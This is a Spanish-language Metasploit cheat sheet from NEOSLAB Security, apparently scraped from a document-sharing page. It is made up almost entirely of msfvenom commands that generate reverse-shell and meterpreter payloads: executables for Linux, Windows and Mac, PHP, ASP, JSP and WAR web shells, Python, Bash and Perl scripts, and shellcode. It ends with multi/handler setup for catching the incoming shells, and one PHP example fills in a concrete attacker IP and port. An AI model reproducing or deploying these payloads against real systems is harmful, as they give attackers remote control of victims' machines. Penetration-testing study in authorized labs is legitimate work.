Sie sind auf Seite 1von 5

CREAR PAYLOAD

En METASPLOIT
www.neoslab.com

ab.com
CREAR PAYLOAD
En METASPLOIT

GENERAL

Título CREAR PAYLOAD EN METASPLOIT


Fecha 2018 / 02 / 22
Autor @neoslab
Sitio Web https://neoslab.com

ÍNDICE

Lista de Payloads disponibles ….....……………………………………………………………….. 3


Payloads Binarie ….....……………………………………………………………….. 3
Payloads Web ….....………………………………………………………………… 3
Scripting Payloads ….....………………………………………………………………… 4
Shellcode Payloads ….....………………………………………………………………… 4
Crear controladores ….....………………………………………………………………… 5
Usar Payloads Personalizados ….....………………………………………………………………… 5

2 NEOSLAB SECURITY
Medellín ~ Colombia
contact@neoslab.com
www.neoslab.com
CREAR PAYLOAD
En METASPLOIT
A menudo, una de las habilidades más útiles y subestimadas por el principiante de Metasploit es el módulo
msfpayload. Se pueden crear múltiples payloads con este módulo y ayudar a que pueda darle un shell en casi
cualquier situación. Para cada uno de estos payloads, puede acceder a msfconsole y seleccionar exploit/multi/
handler. Ejecute 'establecer payloads' para los payloads relevantes utilizados y configurar todas las opciones
necesarias (LHOST, LPORT, etc.).

Para los ejemplos a continuación es bastante explicativo, pero LHOST debe completarse con su dirección IP
(LAN IP si ataca dentro de la red, WAN IP si ataca a través de Internet), y LPORT debe ser el puerto que desea
volver a conectar.

1. LISTA DE PAYLOADS DISPONIBLE

$ msfvenom -l

2. PAYLOADS BINARIE

2.1 Linux

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<YOUR-IP-ADDRESS>


LPORT=<YOUR-LOCAL-PORT> -f elf > shell.elf

2.2 Windows

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<YOUR-IP-ADDRESS>


LPORT=<YOUR-LOCAL-PORT> -f exe > shell.exe

2.3 Mac

$ msfvenom -p osx/x86/shell_reverse_tcp LHOST=<YOUR-IP-ADDRESS> LPORT=<YOUR-


LOCAL-PORT> -f macho > shell.macho

3. PAYLOADS WEB

3.1 PHP

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=52.15.194.28 LPORT=12663 -e


php/base64 R > shell.php

Como el archivo se ha codificado con base64, no olvide abrirlo con su editor de texto favorito y agregar "<?php"
en la parte superior y "?>" al final.

3 NEOSLAB SECURITY
Medellín ~ Colombia
contact@neoslab.com
www.neoslab.com
CREAR PAYLOAD
En METASPLOIT

3.2 ASP

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<YOUR-IP-ADDRESS>


LPORT=<YOUR-LOCAL-PORT> -f asp > shell.asp

3.3 JSP

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<YOUR-IP-ADDRESS> LPORT=<YOUR-


LOCAL-PORT> -f raw > shell.jsp

3.4 WAR

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<YOUR-IP-ADDRESS> LPORT=<YOUR-


LOCAL-PORT> -f war > shell.war

4. SCRIPTING PAYLOADS

4.1 Python

$ msfvenom -p cmd/unix/reverse_python LHOST=<YOUR-IP-ADDRESS> LPORT=<YOUR-


LOCAL-PORT> -f raw > shell.py

4.2 Bash

$ msfvenom -p cmd/unix/reverse_bash LHOST=<YOUR-IP-ADDRESS> LPORT=<YOUR-LOCAL-


PORT> -f raw > shell.sh

4.3 Perl

$ msfvenom -p cmd/unix/reverse_perl LHOST=<YOUR-IP-ADDRESS> LPORT=<YOUR-LOCAL-


PORT> -f raw > shell.pl

5. SHELLCODE PAYLOADS

Para todos los shellcode, consulte 'msfvenom -help-formats' para obtener información sobre los parámetros váli-
dos. Msfvenom dará salida al código que se puede cortar y pegar en este idioma para sus exploits.

5.1 Shellcode basado en Linux

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<YOUR-IP-ADDRESS>


LPORT=<YOUR-LOCAL-PORT> -f <LANGUAGE>

4 NEOSLAB SECURITY
Medellín ~ Colombia
contact@neoslab.com
www.neoslab.com
CREAR PAYLOAD
En METASPLOIT
5.2 Shellcode basado en Windows

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<YOUR-IP-ADDRESS>


LPORT=<YOUR-LOCAL-PORT> -f <LANGUAGE>

5.3 Shellcode basado en Mac

$ msfvenom -p osx/x86/shell_reverse_tcp LHOST=<YOUR-IP-ADDRESS> LPORT=<YOUR-


LOCAL-PORT> -f <LANGUAGE>

6. CREAR CONTROLADORES

Los controladores de Metasploit pueden ser excelentes para configurar rápidamente Metasploit para que esté en
condiciones de recibir sus Shell entrantes. Los controladores deben estar en el siguiente formato.

$ msfconsole
$ msf > use exploit/multi/handler
$ msf exploit(multi/handler) > set LHOST 0.0.0.0
$ msf exploit(multi/handler) > set PAYLOAD <Payload name>
$ msf exploit(multi/handler) > set LHOST <LHOST value>
$ msf exploit(multi/handler) > set LPORT <LPORT value>
$ msf exploit(multi/handler) > set ExitOnSession false
$ msf exploit(multi/handler) > exploit -j -z

7. USAR PAYLOADS PERZONALIZADOS

Metasploit te permite generar payloads y usarlos durante un ataque. Para usar esta función, simplemente genere
su Payload antes de ejecutar su ataque y una vez que haya terminado, use "payload/generic/custom" para
especificar el payload a usar.

$ msfconsole
$ msf > use payload/generic/custom
$ msf payload(custom) > show options
$ ...show and set options...
$ msf payload(custom) > set PAYLOADFILE /path/to/the/payload
$ msf payload(custom) > set PAYLOADSTR the_payload_string_to_use

5 NEOSLAB SECURITY
Medellín ~ Colombia
contact@neoslab.com
www.neoslab.com

Das könnte Ihnen auch gefallen